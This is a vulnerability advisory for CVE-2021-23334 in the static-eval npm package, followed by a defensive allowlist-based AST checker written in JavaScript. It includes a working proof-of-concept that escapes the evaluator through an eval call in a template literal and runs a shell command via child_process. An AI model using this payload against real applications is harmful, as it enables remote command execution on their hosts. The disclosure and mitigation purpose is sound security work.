CVE

CVE-2021-23334

All versions of package static-eval are vulnerable to Arbitrary Code Execution when the evaluated AST contains FunctionExpression and TemplateLiteral nodes: the expression inside a template literal placeholder is evaluated, and an eval() call placed there reaches the host runtime.

PoC:

var evaluate = require('static-eval');
var parse = require('esprima').parse;

// Source string: an immediately invoked FunctionExpression whose body returns a
// TemplateLiteral; the ${...} placeholder carries the eval() call that reaches
// the host runtime (here it runs `ls` through child_process).
var src = "(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()";
var ast = parse(src).body[0].expression;
evaluate(ast);
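A defensive check an application embedding static-eval can apply before evaluating untrusted input, added here as an illustration and not part of the advisory or of static-eval itself: walk the ESTree AST and refuse to evaluate anything outside a small allowlist of node types, which rejects FunctionExpression and TemplateLiteral (and CallExpression) nodes outright. The two AST objects are constructed inline in the shape esprima's parse() emits, so the example runs without esprima or static-eval installed; the allowlist is an assumed example set, to be narrowed to what the embedding application really needs.

```javascript
// Sample allowlist (assumption): only literal/arithmetic/lookup node types.
const ALLOWED_NODE_TYPES = new Set([
  'Literal', 'Identifier', 'BinaryExpression', 'UnaryExpression',
  'LogicalExpression', 'ConditionalExpression', 'ArrayExpression',
  'ObjectExpression', 'Property', 'MemberExpression',
]);

// Recursively visits every object-valued child of an ESTree node and returns
// the type of the first node not in the allowlist, or null if the tree is clean.
function findDisallowedNode(node) {
  if (node === null || typeof node !== 'object') return null;
  if (Array.isArray(node)) {
    for (const child of node) {
      const hit = findDisallowedNode(child);
      if (hit) return hit;
    }
    return null;
  }
  if (typeof node.type === 'string' && !ALLOWED_NODE_TYPES.has(node.type)) {
    return node.type;
  }
  for (const key of Object.keys(node)) {
    if (key === 'type' || key === 'loc' || key === 'range') continue; // metadata, not children
    const hit = findDisallowedNode(node[key]);
    if (hit) return hit;
  }
  return null;
}

// Gate to call before evaluate(ast): true only when every node is allowlisted.
function safeToEvaluate(ast) {
  return findDisallowedNode(ast) === null;
}

// Constructed AST for `1 + 2 * x`, shaped as esprima would emit it.
const ARITHMETIC_AST = {
  type: 'BinaryExpression', operator: '+',
  left: { type: 'Literal', value: 1 },
  right: {
    type: 'BinaryExpression', operator: '*',
    left: { type: 'Literal', value: 2 },
    right: { type: 'Identifier', name: 'x' },
  },
};

// Constructed AST with the advisory's shape: an immediately invoked
// FunctionExpression returning a TemplateLiteral whose placeholder calls eval().
// The eval argument is a placeholder literal, not the advisory's payload.
const POC_SHAPED_AST = {
  type: 'CallExpression',
  callee: {
    type: 'FunctionExpression',
    params: [{ type: 'Identifier', name: 'x' }],
    body: {
      type: 'BlockStatement',
      body: [{
        type: 'ReturnStatement',
        argument: {
          type: 'TemplateLiteral',
          quasis: [],
          expressions: [{
            type: 'CallExpression',
            callee: { type: 'Identifier', name: 'eval' },
            arguments: [{ type: 'Literal', value: 'placeholder' }],
          }],
        },
      }],
    },
  },
  arguments: [],
};

console.log('arithmetic safe:', safeToEvaluate(ARITHMETIC_AST));   // true
console.log('PoC-shaped rejected at:', findDisallowedNode(POC_SHAPED_AST)); // CallExpression
```

In use, the gate runs between parse() and evaluate(): `if (!safeToEvaluate(ast)) throw new Error('expression not allowed')`. The walk returns the first offending node type it meets, which makes the rejection easy to log; an allowlist (rather than a denylist of known-bad node types) is the design choice that matters, since it also covers node types the advisory does not name.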

Source: CVE-2021-23334